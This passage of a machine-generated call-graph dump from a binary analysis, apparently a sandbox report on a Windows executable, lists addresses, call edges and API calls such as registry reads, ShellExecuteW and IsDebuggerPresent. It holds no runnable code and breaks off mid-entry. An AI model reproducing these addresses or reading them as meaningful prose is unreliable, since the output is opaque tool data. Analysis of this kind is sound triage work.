84993->84940 84994->84976 84996 41171a 75 API calls 84995->84996 84997 4013c4 84996->84997 85007 401380 84997->85007 85000 40df50 75 API calls 85000->84969 85001->84972 85002->84976 85003->84955 85004->84963 85005->84971 85006->84985 85008 41171a 75 API calls 85007->85008 85009 401387 85008->85009 85009->85000 85010 40116e 85011 401119 DefWindowProcW 85010->85011 85012 429212 85017 410b90 85012->85017 85015 411421 __cinit 74 API calls 85016 42922f 85015->85016 85018 410b9a __write_nolock 85017->85018 85019 41171a 75 API calls 85018->85019 85020 410c31 GetModuleFileNameW 85019->85020 85034 413db0 85020->85034 85022 410c66 _wcsncat 85037 413e3c 85022->85037 85025 41171a 75 API calls 85026 410ca3 _wcscpy 85025->85026 85027 410cd1 RegOpenKeyExW 85026->85027 85028 429bc3 RegQueryValueExW 85027->85028 85029 410cf7 85027->85029 85030 429cd9 RegCloseKey 85028->85030 85031 429bf2 _wcscat _wcslen _wcsncpy 85028->85031 85029->85015 85032 41171a 75 API calls 85031->85032 85033 429cd8 85031->85033 85032->85031 85033->85030 85040 413b95 85034->85040 85070 41abec 85037->85070 85041 413c2f 85040->85041 85047 413bae 85040->85047 85042 413d60 85041->85042 85043 413d7b 85041->85043 85066 417f23 67 API calls __getptd_noexit 85042->85066 85068 417f23 67 API calls __getptd_noexit 85043->85068 85046 413d65 85052 413cfb 85046->85052 85067 417ebb 6 API calls 2 library calls 85046->85067 85047->85041 85056 413c1d 85047->85056 85062 41ab19 67 API calls __wcsnicmp_l 85047->85062 85050 413d03 85050->85041 85050->85052 85053 413d8e 85050->85053 85051 413cb9 85051->85041 85054 413cd6 85051->85054 85064 41ab19 67 API calls __wcsnicmp_l 85051->85064 85052->85022 85069 41ab19 67 API calls __wcsnicmp_l 85053->85069 85054->85041 85054->85052 85058 413cef 85054->85058 85056->85041 85061 413c9b 85056->85061 85063 41ab19 67 API calls __wcsnicmp_l 85056->85063 85065 41ab19 67 API calls __wcsnicmp_l 85058->85065 85061->85050 85061->85051 85062->85056 85063->85061 85064->85054 85065->85052 85066->85046 85068->85046 85069->85052 85071 41ac02 85070->85071 85072 41abfd 85070->85072 85079 417f23 67 API calls __getptd_noexit 85071->85079 85072->85071 85073 41ac22 85072->85073 85077 410c99 85073->85077 85081 417f23 67 API calls __getptd_noexit 85073->85081 85077->85025 85078 41ac07 85080 417ebb 6 API calls 2 library calls 85078->85080 85079->85078 85081->85078 85082 401230 85083 401241 _memset 85082->85083 85084 4012c5 85082->85084 85097 401be0 85083->85097 85086 40126b 85087 4012ae KillTimer SetTimer 85086->85087 85088 42aa61 85086->85088 85089 401298 85086->85089 85087->85084 85090 42aa8b Shell_NotifyIconW 85088->85090 85091 42aa69 Shell_NotifyIconW 85088->85091 85092 4012a2 85089->85092 85093 42aaac 85089->85093 85090->85087 85091->85087 85092->85087 85096 42aaf8 Shell_NotifyIconW 85092->85096 85094 42aad7 Shell_NotifyIconW 85093->85094 85095 42aab5 Shell_NotifyIconW 85093->85095 85094->85087 85095->85087 85096->85087 85098 401bfb 85097->85098 85117 401cde 85097->85117 85099 4013a0 75 API calls 85098->85099 85100 401c0b 85099->85100 85101 42a9a0 LoadStringW 85100->85101 85102 401c18 85100->85102 85104 42a9bb 85101->85104 85119 4021e0 85102->85119 85132 40df50 75 API calls 85104->85132 85105 401c2d 85106 401c3a 85105->85106 85107 42a9cd 85105->85107 85106->85104 85109 401c44 85106->85109 85133 40d3b0 75 API calls 2 library calls 85107->85133 85131 40d3b0 75 API calls 2 library calls 85109->85131 85112 42a9dc 85113 42a9f0 85112->85113 85115 401c53 _memset _wcscpy _wcsncpy 85112->85115 85134 40d3b0 75 API calls 2 library calls 85113->85134 85116 401cc2 Shell_NotifyIconW 85115->85116 85116->85117 85117->85086 85118 42a9fe 85120 4021f1 _wcslen 85119->85120 85121 42a598 85119->85121 85124 402205 85120->85124 85125 402226 85120->85125 85136 40c740 85121->85136 85123 42a5a2 85135 404020 75 API calls ctype 85124->85135 85127 401380 75 API calls 85125->85127 85129 40222d 85127->85129 85128 40220c _memcpy_s 85128->85105 85129->85123 85130 41171a 75 API calls 85129->85130 85130->85128 85131->85115 85132->85115 85133->85112 85134->85118 85135->85128 85137 40c752 85136->85137 85138 40c747 85136->85138 85137->85123 85138->85137 85141 402ae0 85138->85141 85140 42a572 _memcpy_s 85140->85123 85142 42a06a 85141->85142 85143 402aef 85141->85143 85144 401380 75 API calls 85142->85144 85143->85140 85145 42a072 85144->85145 85146 41171a 75 API calls 85145->85146 85147 42a095 _memcpy_s 85146->85147 85147->85140 85148 4034b0 85149 4034b9 85148->85149 85150 4034bd 85148->85150 85151 41171a 75 API calls 85150->85151 85152 42a0ba 85150->85152 85153 4034fe _memcpy_s ctype 85151->85153 85154 40f110 RegOpenKeyExW 85155 40f13c RegQueryValueExW RegCloseKey 85154->85155 85156 40f15f 85154->85156 85155->85156 85157 402dd0 85158 41171a 75 API calls 85157->85158 85159 402e03 85158->85159 85160 41171a 75 API calls 85159->85160 85182 402e16 ctype 85160->85182 85162 403094 ctype 85165 40305a ctype 85187 402cc0 75 API calls 2 library calls 85165->85187 85166 42b5fe 85191 45ffa9 118 API calls 3 library calls 85166->85191 85167 403770 75 API calls 85167->85182 85169 42b5c3 85190 45ffa9 118 API calls 3 library calls 85169->85190 85170 403470 75 API calls 85170->85182 85172 42b612 85172->85162 85192 45ffa9 118 API calls 3 library calls 85172->85192 85174 402cc0 75 API calls 85174->85182 85176 42b68a 85194 402cc0 75 API calls 2 library calls 85176->85194 85177 42b655 85185 42b5e1 85177->85185 85193 402cc0 75 API calls 2 library calls 85177->85193 85178 402ae0 75 API calls 85179 402ff0 CharUpperBuffW 85178->85179 85179->85182 85181 402650 75 API calls 85181->85182 85182->85165 85182->85166 85182->85167 85182->85169 85182->85170 85182->85172 85182->85174 85182->85176 85182->85178 85182->85181 85184 41171a 75 API calls 85182->85184 85186 4035d0 86 API calls 85182->85186 85188 402b70 76 API calls 85182->85188 85189 403530 118 API calls _memcpy_s 85182->85189 85184->85182 85185->85162 85186->85182 85187->85162 85188->85182 85189->85182 85190->85185 85191->85172 85192->85177 85193->85185 85194->85162 85195 416193 85232 41718c 85195->85232 85197 41619f GetStartupInfoW 85199 4161c2 85197->85199 85233 41aa31 HeapCreate 85199->85233 85201 416212 85235 416e29 GetModuleHandleW 85201->85235 85205 416223 __RTC_Initialize 85269 41b669 85205->85269 85208 416231 85209 41623d GetCommandLineW 85208->85209 85338 4117af 67 API calls 3 library calls 85208->85338 85284 42235f GetEnvironmentStringsW 85209->85284 85212 41623c 85212->85209 85213 41624c 85290 4222b1 GetModuleFileNameW 85213->85290 85215 416256 85216 416261 85215->85216 85339 4117af 67 API calls 3 library calls 85215->85339 85294 422082 85216->85294 85220 416272 85307 41186e 85220->85307 85223 416279 85225 416284 __wwincmdln 85223->85225 85341 4117af 67 API calls 3 library calls 85223->85341 85313 40d7f0 85225->85313 85228 4162b3 85343 411a4b 67 API calls _doexit 85228->85343 85231 4162b8 __sopen_helper 85232->85197 85234 416206 85233->85234 85234->85201 85336 41616a 67 API calls 3 library calls 85234->85336 85236 416e44 85235->85236 85237 416e3d 85235->85237 85239 416fac 85236->85239 85240 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 85236->85240 85344 41177f Sleep GetModuleHandleW 85237->85344 85354 416ad5 70 API calls 2 library calls 85239->85354 85242 416e97 TlsAlloc 85240->85242 85241 416e43 85241->85236 85245 416218 85242->85245 85246 416ee5 TlsSetValue 85242->85246 85245->85205 85337 41616a 67 API calls 3 library calls 85245->85337 85246->85245 85247 416ef6 85246->85247 85345 411a69 6 API calls 4 library calls 85247->85345 85249 416efb 85250 41696e __encode_pointer 6 API calls 85249->85250 85251 416f06 85250->85251 85252 41696e __encode_pointer 6 API calls 85251->85252 85253 416f16 85252->85253 85254 41696e __encode_pointer 6 API calls 85253->85254 85255 416f26 85254->85255 85256 41696e __encode_pointer 6 API calls 85255->85256 85257 416f36 85256->85257 85346 41828b InitializeCriticalSectionAndSpinCount __ioinit 85257->85346 85259 416f43 85259->85239 85260 4169e9 __decode_pointer 6 API calls 85259->85260 85261 416f57 85260->85261 85261->85239 85347 416ffb 85261->85347 85264 4169e9 __decode_pointer 6 API calls 85265 416f8a 85264->85265 85265->85239 85266 416f91 85265->85266 85353 416b12 67 API calls 5 library calls 85266->85353 85268 416f99 GetCurrentThreadId 85268->85245 85373 41718c 85269->85373 85271 41b675 GetStartupInfoA 85272 416ffb __calloc_crt 67 API calls 85271->85272 85274 41b696 85272->85274 85273 41b8b4 __sopen_helper 85273->85208 85274->85273 85276 416ffb __calloc_crt 67 API calls 85274->85276 85279 41b7fb 85274->85279 85283 41b77e 85274->85283 85275 41b831 GetStdHandle 85275->85279 85276->85274 85277 41b896 SetHandleCount 85277->85273 85278 41b843 GetFileType 85278->85279 85279->85273 85279->85275 85279->85277 85279->85278 85375 4189e6 InitializeCriticalSectionAndSpinCount __sopen_helper 85279->85375 85280 41b7a7 GetFileType 85280->85283 85283->85273 85283->85279 85283->85280 85374 4189e6 InitializeCriticalSectionAndSpinCount __sopen_helper 85283->85374 85285 422370 85284->85285 85286 422374 85284->85286 85285->85213 85286->85286 85287 416fb6 __malloc_crt 67 API calls 85286->85287 85288 422395 _memcpy_s 85287->85288 85289 42239c FreeEnvironmentStringsW 85288->85289 85289->85213 85291 4222e6 _wparse_cmdline 85290->85291 85292 416fb6 __malloc_crt 67 API calls 85291->85292 85293 422329 _wparse_cmdline 85291->85293 85292->85293 85293->85215 85295 42209a _wcslen 85294->85295 85299 416267 85294->85299 85296 416ffb __calloc_crt 67 API calls 85295->85296 85302 4220be _wcslen 85296->85302 85297 422123 85298 413a88 __fclose_nolock 67 API calls 85297->85298 85298->85299 85299->85220 85340 4117af 67 API calls 3 library calls 85299->85340 85300 416ffb __calloc_crt 67 API calls 85300->85302 85301 422149 85303 413a88 __fclose_nolock 67 API calls 85301->85303 85302->85297 85302->85299 85302->85300 85302->85301 85305 422108 85302->85305 85376 426349 67 API calls __wcsnicmp_l 85302->85376 85303->85299 85305->85302 85377 417d93 10 API calls 3 library calls 85305->85377 85309 41187c __IsNonwritableInCurrentImage 85307->85309 85378 418486 85309->85378 85310 41189a __initterm_e 85311 411421 __cinit 74 API calls 85310->85311 85312 4118b9 __IsNonwritableInCurrentImage __initterm 85310->85312 85311->85312 85312->85223 85314 431bcb 85313->85314 85315 40d80c 85313->85315 85316 4092c0 VariantClear 85315->85316 85317 40d847 85316->85317 85382 40eb50 85317->85382 85320 40d877 85385 411ac6 67 API calls 4 library calls 85320->85385 85323 40d888 85386 411b24 67 API calls __wcsnicmp_l 85323->85386 85325 40d891 85387 40f370 SystemParametersInfoW SystemParametersInfoW 85325->85387 85327 40d89f 85388 40d6d0 GetCurrentDirectoryW 85327->85388 85329 40d8a7 SystemParametersInfoW 85330 40d8d4 85329->85330 85331 40d8cd FreeLibrary 85329->85331 85332 4092c0 VariantClear 85330->85332 85331->85330 85333 40d8dd 85332->85333 85334 4092c0 VariantClear 85333->85334 85335 40d8e6 85334->85335 85335->85228 85342 411a1f 67 API calls _doexit 85335->85342 85336->85201 85337->85205 85338->85212 85339->85216 85340->85220 85341->85225 85342->85228 85343->85231 85344->85241 85345->85249 85346->85259 85350 417004 85347->85350 85349 416f70 85349->85239 85349->85264 85350->85349 85351 417022 Sleep 85350->85351 85355 422452 85350->85355 85352 417037 85351->85352 85352->85349 85352->85350 85353->85268 85354->85245 85356 42245e __sopen_helper 85355->85356 85357 422476 85356->85357 85367 422495 _memset 85356->85367 85368 417f23 67 API calls __getptd_noexit 85357->85368 85359 42247b 85369 417ebb 6 API calls 2 library calls 85359->85369 85360 422507 HeapAlloc 85360->85367 85363 418407 __lock 66 API calls 85363->85367 85364 42248b __sopen_helper 85364->85350 85367->85360 85367->85363 85367->85364 85370 41a74c 5 API calls 2 library calls 85367->85370 85371 42254e LeaveCriticalSection _doexit 85367->85371 85372 411afc 6 API calls __decode_pointer 85367->85372 85368->85359 85370->85367 85371->85367 85372->85367 85373->85271 85374->85283 85375->85279 85376->85302 85377->85305 85380 41848c 85378->85380 85379 41696e __encode_pointer 6 API calls 85379->85380 85380->85379 85381 4184a4 85380->85381 85381->85310 85426 40eb70 85382->85426 85385->85323 85386->85325 85387->85327 85430 401f80 85388->85430 85390 40d6f1 IsDebuggerPresent 85391 431a9d MessageBoxA 85390->85391 85392 40d6ff 85390->85392 85393 431ab6 85391->85393 85392->85393 85394 40d71f 85392->85394 85532 403e90 75 API calls 3 library calls 85393->85532 85500 40f3b0 85394->85500 85398 40d73a GetFullPathNameW 85530 401440 127 API calls _wcscat 85398->85530 85400 40d77a 85401 40d782 85400->85401 85402 431b09 SetCurrentDirectoryW 85400->85402 85403 40d78b 85401->85403 85533 43604b 6 API calls 85401->85533 85402->85401 85512 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 85403->85512 85406 431b28 85406->85403 85408 431b30 GetModuleFileNameW 85406->85408 85410 431ba4 GetForegroundWindow ShellExecuteW 85408->85410 85411 431b4c 85408->85411 85413 40d7c7 85410->85413 85534 401b70 85411->85534 85412 40d795 85420 40d7a8 85412->85420 85520 40e1e0 85412->85520 85417 40d7d1 SetCurrentDirectoryW 85413->85417 85417->85329 85419 431b66 85541 40d3b0 75 API calls 2 library calls 85419->85541 85420->85413 85531 401000 Shell_NotifyIconW _memset 85420->85531 85423 431b72 GetForegroundWindow ShellExecuteW 85424 431b9f 85423->85424 85424->85413 85425 40eba0 LoadLibraryA GetProcAddress 85425->85320 85427 40d86e 85426->85427 85428 40eb76 LoadLibraryA 85426->85428 85427->85320 85427->85425 85428->85427 85429 40eb87 GetProcAddress 85428->85429 85429->85427 85542 40e680 85430->85542 85434 401fa2 GetModuleFileNameW 85560 40ff90 85434->85560 85436 401fbd 85572 4107b0 85436->85572 85439 401b70 75 API calls 85440 401fe4 85439->85440 85575 4019e0 85440->85575 85442 401ff2 85443 4092c0 VariantClear 85442->85443 85444 402002 85443->85444 85445 401b70 75 API calls 85444->85445 85446 40201c 85445->85446 85447 4019e0 76 API calls 85446->85447 85448 40202c 85447->85448 85449 401b70 75 API calls 85448->85449 85450 40203c 85449->85450 85583 40c3e0 85450->85583 85452 40204d 85601 40c060 85452->85601 85456 40206e 85613 4115d0 85456->85613 85459 42c174 85462 401a70 75 API calls 85459->85462 85460 402088 85461 4115d0 __wcsicoll 79 API calls 85460->85461 85464 402093 85461->85464 85463 42c189 85462->85463 85466 401a70 75 API calls 85463->85466 85464->85463 85465 40209e 85464->85465 85467 4115d0 __wcsicoll 79 API calls 85465->85467 85468 42c1a7 85466->85468 85469 4020a9 85467->85469 85470 42c1b0 GetModuleFileNameW 85468->85470 85469->85470 85471 4020b4 85469->85471 85473 401a70 75 API calls 85470->85473 85472 4115d0 __wcsicoll 79 API calls 85471->85472 85474 4020bf 85472->85474 85475 42c1e2 85473->85475 85476 402107 85474->85476 85479 42c20a _wcscpy 85474->85479 85482 401a70 75 API calls 85474->85482 85625 40df50 75 API calls 85475->85625 85478 402119 85476->85478 85476->85479 85481 42c243 85478->85481 85621 40e7e0 76 API calls 85478->85621 85487 401a70 75 API calls 85479->85487 85480 42c1f1 85483 401a70 75 API calls 85480->85483 85485 4020e5 _wcscpy 85482->85485 85486 42c201 85483->85486 85491 401a70 75 API calls 85485->85491 85486->85479 85495 402148 85487->85495 85488 402132 85622 40d030 76 API calls 85488->85622 85490 40213e 85492 4092c0 VariantClear 85490->85492 85491->85476 85492->85495 85493 402184 85497 4092c0 VariantClear 85493->85497 85495->85493 85498 401a70 75 API calls 85495->85498 85623 40d030 76 API calls 85495->85623 85624 40e640 76 API calls 85495->85624 85499 402196 ctype 85497->85499 85498->85495 85499->85390 85501 42ccf4 _memset 85500->85501 85502 40f3c9 85500->85502 85505 42cd05 GetOpenFileNameW 85501->85505 86302 40ffb0 76 API calls ctype 85502->86302 85504 40f3d2 86303 410130 SHGetMalloc 85504->86303 85505->85502 85507 40d732 85505->85507 85507->85398 85507->85400 85508 40f3d9 86308 410020 88 API calls __wcsicoll 85508->86308 85510 40f3e7 86309 40f400 85510->86309 85513 42b9d3 85512->85513 85514 41025a LoadImageW RegisterClassExW 85512->85514 86356 443e8f EnumResourceNamesW LoadImageW 85513->86356 86355 4102f0 7 API calls 85514->86355 85517 40d790 85519 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 85517->85519 85518 42b9da 85519->85412 85522 40e207 _memset 85520->85522 85521 40e262 85527 40e2a4 85521->85527 86357 43737d 84 API calls __wcsicoll 85521->86357 85522->85521 85523 42aa14 DestroyIcon 85522->85523 85523->85521 85525 40e2c0 Shell_NotifyIconW 85528 401be0 77 API calls 85525->85528 85526 42aa50 Shell_NotifyIconW 85527->85525 85527->85526 85529 40e2da 85528->85529 85529->85420 85530->85400 85531->85413 85532->85400 85533->85406 85535 401b76 _wcslen 85534->85535 85536 41171a 75 API calls 85535->85536 85539 401bc5 85535->85539 85537 401bad _memcpy_s 85536->85537 85538 41171a 75 API calls 85537->85538 85538->85539 85540 40d3b0 75 API calls 2 library calls 85539->85540 85540->85419 85541->85423 85543 40c060 75 API calls 85542->85543 85544 401f90 85543->85544 85545 402940 85544->85545 85546 40294a __write_nolock 85545->85546 85547 4021e0 75 API calls 85546->85547 85549 402972 85547->85549 85555 4029a4 85549->85555 85626 401cf0 85549->85626 85550 402ae0 75 API calls 85550->85555 85551 402a8c 85552 401b70 75 API calls 85551->85552 85559 402abe 85551->85559 85554 402ab3 85552->85554 85553 401b70 75 API calls 85553->85555 85630 40d970 75 API calls 2 library calls 85554->85630 85555->85550 85555->85551 85555->85553 85557 401cf0 75 API calls 85555->85557 85629 40d970 75 API calls 2 library calls 85555->85629 85557->85555 85559->85434 85631 40f5e0 85560->85631 85563 40ffa6 85563->85436 85565 42b6d8 85568 42b6e6 85565->85568 85687 434fe1 85565->85687 85567 413a88 __fclose_nolock 67 API calls 85569 42b6f5 85567->85569 85568->85567 85570 434fe1 106 API calls 85569->85570 85571 42b702 85570->85571 85571->85436 85573 41171a 75 API calls 85572->85573 85574 401fd6 85573->85574 85574->85439 85576 401a03 85575->85576 85581 4019e5 85575->85581 85577 401a1a 85576->85577 85576->85581 86291 404260 76 API calls 85577->86291 85578 4019ff 85578->85442 85580 401a26 85580->85442 85581->85578 86290 404260 76 API calls 85581->86290 85584 40c3e4 85583->85584 85585 40c42c 85583->85585 85586 40c3f0 85584->85586 85587 42a475 85584->85587 85588 42a422 85585->85588 85589 40c435 85585->85589 86292 4042f0 75 API calls __cinit 85586->86292 86297 453155 75 API calls 85587->86297 85591 42a427 85588->85591 85592 42a445 85588->85592 85593 40c441 85589->85593 85594 42a455 85589->85594 85600 40c3fb 85591->85600 86294 453155 75 API calls 85591->86294 86295 453155 75 API calls 85592->86295 86293 4042f0 75 API calls __cinit 85593->86293 86296 453155 75 API calls 85594->86296 85600->85452 85602 41171a 75 API calls 85601->85602 85603 40c088 85602->85603 85604 41171a 75 API calls 85603->85604 85605 402061 85604->85605 85606 401a70 85605->85606 85607 401a90 85606->85607 85608 401a77 85606->85608 85609 4021e0 75 API calls 85607->85609 85610 401a8d 85608->85610 86298 404080 75 API calls _memcpy_s 85608->86298 85611 401a9c 85609->85611 85610->85456 85611->85456 85614 4115e1 85613->85614 85615 411650 85613->85615 85619 40207d 85614->85619 86299 417f23 67 API calls __getptd_noexit 85614->86299 86301 4114bf 79 API calls 3 library calls 85615->86301 85618 4115ed 86300 417ebb 6 API calls 2 library calls 85618->86300 85619->85459 85619->85460 85621->85488 85622->85490 85623->85495 85624->85495 85625->85480 85627 402ae0 75 API calls 85626->85627 85628 401cf7 85627->85628 85628->85549 85629->85555 85630->85559 85691 40f580 85631->85691 85633 40f5f8 _strcat ctype 85699 40f6d0 85633->85699 85638 42b2ee 85728 4151b0 85638->85728 85640 40f679 85640->85638 85641 40f681 85640->85641 85715 414e94 85641->85715 85645 40f68b 85645->85563 85650 452574 85645->85650 85647 42b31d 85734 415484 85647->85734 85649 42b33d 85651 41557c _fseek 105 API calls 85650->85651 85652 4525df 85651->85652 86235 4523ce 85652->86235 85655 4525fc 85655->85565 85656 4151b0 __fread_nolock 81 API calls 85657 45261d 85656->85657 85658 4151b0 __fread_nolock 81 API calls 85657->85658 85659 45262e 85658->85659 85660 4151b0 __fread_nolock 81 API calls 85659->85660 85661 452649 85660->85661 85662 4151b0 __fread_nolock 81 API calls 85661->85662 85663 452666 85662->85663 85664 41557c _fseek 105 API calls 85663->85664 85665 452682 85664->85665 85666 4138ba _malloc 67 API calls 85665->85666 85667 45268e 85666->85667 85668 4138ba _malloc 67 API calls 85667->85668 85669 45269b 85668->85669 85670 4151b0 __fread_nolock 81 API calls 85669->85670 85671 4526ac 85670->85671 85672 44afdc GetSystemTimeAsFileTime 85671->85672 85673 4526bf 85672->85673 85674 4526d5 85673->85674 85675 4526fd 85673->85675 85676 413a88 __fclose_nolock 67 API calls 85674->85676 85677 452704 85675->85677 85678 45275b 85675->85678 85679 4526df 85676->85679 86241 44b195 85677->86241 85681 413a88 __fclose_nolock 67 API calls 85678->85681 85682 413a88 __fclose_nolock 67 API calls 85679->85682 85684 452759 85681->85684 85685 4526e8 85682->85685 85683 452753 85686 413a88 __fclose_nolock 67 API calls 85683->85686 85684->85565 85685->85565 85686->85684 85688 434ff1 85687->85688 85689 434feb 85687->85689 85688->85568 85690 414e94 __fcloseall 106 API calls 85689->85690 85690->85688 85692 429440 85691->85692 85693 40f589 _wcslen 85691->85693 85694 40f58f WideCharToMultiByte 85693->85694 85695 40f5d8 85694->85695 85696 40f5ad 85694->85696 85695->85633 85697 41171a 75 API calls 85696->85697 85698 40f5bb WideCharToMultiByte 85697->85698 85698->85633 85700 40f6dd _strlen 85699->85700 85747 40f790 85700->85747 85703 414e06 85766 414d40 85703->85766 85705 40f666 85705->85638 85706 40f450 85705->85706 85710 40f45a _strcat _memcpy_s __write_nolock 85706->85710 85707 4151b0 __fread_nolock 81 API calls 85707->85710 85709 42936d 85711 41557c _fseek 105 API calls 85709->85711 85710->85707 85710->85709 85714 40f531 85710->85714 85849 41557c 85710->85849 85712 429394 85711->85712 85713 4151b0 __fread_nolock 81 API calls 85712->85713 85713->85714 85714->85640 85716 414ea0 __sopen_helper 85715->85716 85717 414ed1 85716->85717 85718 414eb4 85716->85718 85721 415965 __lock_file 68 API calls 85717->85721 85726 414ec9 __sopen_helper 85717->85726 85988 417f23 67 API calls __getptd_noexit 85718->85988 85720 414eb9 85989 417ebb 6 API calls 2 library calls 85720->85989 85723 414ee9 85721->85723 85972 414e1d 85723->85972 85726->85645 86057 41511a 85728->86057 85730 4151c8 85731 44afdc 85730->85731 86228 4431e0 85731->86228 85733 44affd 85733->85647 85735 415490 __sopen_helper 85734->85735 85736 4154bb 85735->85736 85737 41549e 85735->85737 85739 415965 __lock_file 68 API calls 85736->85739 86232 417f23 67 API calls __getptd_noexit 85737->86232 85741 4154c3 85739->85741 85740 4154a3 86233 417ebb 6 API calls 2 library calls 85740->86233 85743 4152e7 __ftell_nolock 71 API calls 85741->85743 85744 4154cf 85743->85744 86234 4154e8 LeaveCriticalSection LeaveCriticalSection _fseek 85744->86234 85746 4154b3 __sopen_helper 85746->85649 85748 40f7ae _memset 85747->85748 85750 40f628 85748->85750 85751 415258 85748->85751 85750->85703 85752 415285 85751->85752 85753 415268 85751->85753 85752->85753 85755 41528c 85752->85755 85762 417f23 67 API calls __getptd_noexit 85753->85762 85764 41c551 103 API calls 14 library calls 85755->85764 85756 41526d 85763 417ebb 6 API calls 2 library calls 85756->85763 85759 41527d 85759->85748 85760 4152b2 85760->85759 85765 4191c9 101 API calls 6 library calls 85760->85765 85762->85756 85764->85760 85765->85759 85767 414d4c __sopen_helper 85766->85767 85768 414d5f 85767->85768 85771 414d95 85767->85771 85818 417f23 67 API calls __getptd_noexit 85768->85818 85770 414d64 85819 417ebb 6 API calls 2 library calls 85770->85819 85785 41e28c 85771->85785 85774 414d74 __sopen_helper @_EH4_CallFilterFunc@8 85774->85705 85775 414d9a 85776 414da1 85775->85776 85777 414dae 85775->85777 85820 417f23 67 API calls __getptd_noexit 85776->85820 85779 414dd6 85777->85779 85780 414db6 85777->85780 85803 41dfd8 85779->85803 85821 417f23 67 API calls __getptd_noexit 85780->85821 85786 41e298 __sopen_helper 85785->85786 85787 418407 __lock 67 API calls 85786->85787 85800 41e2a6 85787->85800 85788 41e322 85789 416fb6 __malloc_crt 67 API calls 85788->85789 85791 41e32c 85789->85791 85799 41e31b 85791->85799 85828 4189e6 InitializeCriticalSectionAndSpinCount __sopen_helper 85791->85828 85792 41e3b0 __sopen_helper 85792->85775 85794 418344 __mtinitlocknum 67 API calls 85794->85800 85796 41e351 85797 41e35c 85796->85797 85798 41e36f EnterCriticalSection 85796->85798 85801 413a88 __fclose_nolock 67 API calls 85797->85801 85798->85799 85823 41e3bb 85799->85823 85800->85788 85800->85794 85800->85799 85826 4159a6 68 API calls __lock 85800->85826 85827 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 85800->85827 85801->85799 85804 41dffb __wopenfile 85803->85804 85805 41e015 85804->85805 85817 41e1e9 85804->85817 85835 4136bc 79 API calls __wcsnicmp_l 85804->85835 85833 417f23 67 API calls __getptd_noexit 85805->85833 85807 41e01a 85834 417ebb 6 API calls 2 library calls 85807->85834 85808 41e247 85830 425db0 85808->85830 85813 41e1e2 85813->85817 85836 4136bc 79 API calls __wcsnicmp_l 85813->85836 85815 41e201 85815->85817 85837 4136bc 79 API calls __wcsnicmp_l 85815->85837 85817->85805 85817->85808 85818->85770 85820->85774 85821->85774 85822 414dfc LeaveCriticalSection LeaveCriticalSection _fseek 85822->85774 85829 41832d LeaveCriticalSection 85823->85829 85825 41e3c2 85825->85792 85826->85800 85827->85800 85828->85796 85829->85825 85838 425ce4 85830->85838 85832 414de1 85832->85822 85833->85807 85835->85813 85836->85815 85837->85817 85839 425cf0 __sopen_helper 85838->85839 85840 425d03 85839->85840 85843 425d41 85839->85843 85841 417f23 __wcsnicmp_l 67 API calls 85840->85841 85842 425d08 85841->85842 85844 417ebb __wcsnicmp_l 6 API calls 85842->85844 85845 4255c4 __tsopen_nolock 132 API calls 85843->85845 85848 425d17 __sopen_helper 85844->85848 85846 425d5b 85845->85846 85847 425d82 __sopen_helper LeaveCriticalSection 85846->85847 85847->85848 85848->85832 85852 415588 __sopen_helper 85849->85852 85850 415596 85880 417f23 67 API calls __getptd_noexit 85850->85880 85851 4155c4 85862 415965 85851->85862 85852->85850 85852->85851 85855 41559b 85881 417ebb 6 API calls 2 library calls 85855->85881 85861 4155ab __sopen_helper 85861->85710 85863 415977 85862->85863 85864 415999 EnterCriticalSection 85862->85864 85863->85864 85865 41597f 85863->85865 85866 4155cc 85864->85866 85867 418407 __lock 67 API calls 85865->85867 85868 4154f2 85866->85868 85867->85866 85869 415512 85868->85869 85870 415502 85868->85870 85872 415524 85869->85872 85883 4152e7 85869->85883 85937 417f23 67 API calls __getptd_noexit 85870->85937 85900 41486c 85872->85900 85874 415507 85882 4155f7 LeaveCriticalSection LeaveCriticalSection _fseek 85874->85882 85880->85855 85882->85861 85884 41531a 85883->85884 85885 4152fa 85883->85885 85887 41453a __fileno 67 API calls 85884->85887 85938 417f23 67 API calls __getptd_noexit 85885->85938 85889 415320 85887->85889 85888 4152ff 85939 417ebb 6 API calls 2 library calls 85888->85939 85891 41efd4 __locking 71 API calls 85889->85891 85892 415335 85891->85892 85893 4153a9 85892->85893 85895 415364 85892->85895 85899 41530f 85892->85899 85940 417f23 67 API calls __getptd_noexit 85893->85940 85896 41efd4 __locking 71 API calls 85895->85896 85895->85899 85897 415404 85896->85897 85898 41efd4 __locking 71 API calls 85897->85898 85897->85899 85898->85899 85899->85872 85901 4148a7 85900->85901 85902 414885 85900->85902 85906 41453a 85901->85906 85902->85901 85903 41453a __fileno 67 API calls 85902->85903 85904 4148a0 85903->85904 85941 41c3cf 101 API calls 6 library calls 85904->85941 85907 41455e 85906->85907 85908 414549 85906->85908 85912 41efd4 85907->85912 85942 417f23 67 API calls __getptd_noexit 85908->85942 85910 41454e 85943 417ebb 6 API calls 2 library calls 85910->85943 85913 41efe0 __sopen_helper 85912->85913 85914 41f003 85913->85914 85915 41efe8 85913->85915 85916 41f011 85914->85916 85921 41f052 85914->85921 85964 417f36 67 API calls __getptd_noexit 85915->85964 85966 417f36 67 API calls __getptd_noexit 85916->85966 85919 41efed 85965 417f23 67 API calls __getptd_noexit 85919->85965 85920 41f016 85967 417f23 67 API calls __getptd_noexit 85920->85967 85944 41ba3b 85921->85944 85925 41f01d 85968 417ebb 6 API calls 2 library calls 85925->85968 85926 41f058 85928 41f065 85926->85928 85929 41f07b 85926->85929 85954 41ef5f 85928->85954 85969 417f23 67 API calls __getptd_noexit 85929->85969 85931 41eff5 __sopen_helper 85931->85874 85933 41f073 85971 41f0a6 LeaveCriticalSection __unlock_fhandle 85933->85971 85934 41f080 85970 417f36 67 API calls __getptd_noexit 85934->85970 85937->85874 85938->85888 85940->85899 85941->85901 85942->85910 85946 41ba47 __sopen_helper 85944->85946 85945 41baa2 85947 41bac4 __sopen_helper 85945->85947 85948 41baa7 EnterCriticalSection 85945->85948 85946->85945 85949 418407 __lock 67 API calls 85946->85949 85947->85926 85948->85947 85950 41ba73 85949->85950 85951 41ba8a 85950->85951 85952 4189e6 __ioinit InitializeCriticalSectionAndSpinCount 85950->85952 85953 41bad2 ___lock_fhandle LeaveCriticalSection 85951->85953 85952->85951 85953->85945 85955 41b9c4 __close_nolock 67 API calls 85954->85955 85956 41ef6e 85955->85956 85957 41ef84 SetFilePointer 85956->85957 85958 